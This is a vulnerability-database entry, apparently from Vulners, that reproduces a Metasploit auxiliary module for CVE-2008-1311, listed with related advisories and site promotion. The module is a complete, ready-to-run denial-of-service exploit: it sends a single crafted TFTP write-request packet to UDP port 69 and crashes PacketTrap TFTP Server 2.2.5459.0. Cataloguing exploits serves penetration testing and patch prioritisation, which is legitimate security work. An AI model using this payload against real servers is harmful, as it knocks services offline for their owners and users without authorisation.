Lucene search
+L

PacketTrap TFTP Server 2.2.5459.0 DoS

🗓️ 09 Jan 2009 05:39:57Reported by kris katterjohn <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 19 Views

PacketTrap TFTP Server 2.2.5459.0 DoS by special write reques

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-1311
29 Oct 200800:00
circl
CVE
CVE-2008-1311
12 Mar 200817:00
cve
Cvelist
CVE-2008-1311
12 Mar 200817:00
cvelist
NVD
CVE-2008-1311
12 Mar 200817:44
nvd
Tenable Nessus
PacketTrap pt360 TFTP Server < 1.0.3302.0 Multiple Vulnerabilities
13 Mar 200800:00
nessus
Packet Storm
PacketTrap TFTP Server 2.2.5459.0 Denial of Service
31 Aug 202400:00
packetstorm
Prion
Code injection
12 Mar 200817:44
prion
Prion
Code injection
12 Mar 200817:44
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
      'Description'    => %q{
        The PacketTrap TFTP server version 2.2.5459.0 can be
        brought down by sending a special write request.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-1311'],
          [ 'OSVDB', '42932'],
          [ 'EDB', '6863']
        ],
      'DisclosureDate' => '2008-10-29'))

    register_options([Opt::RPORT(69)])
  end

  def run
    connect_udp
    print_status("Sending write request...")
    udp_sock.put("\x00\x02|\x00netascii\x00")
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 25
EPSS0.49167
19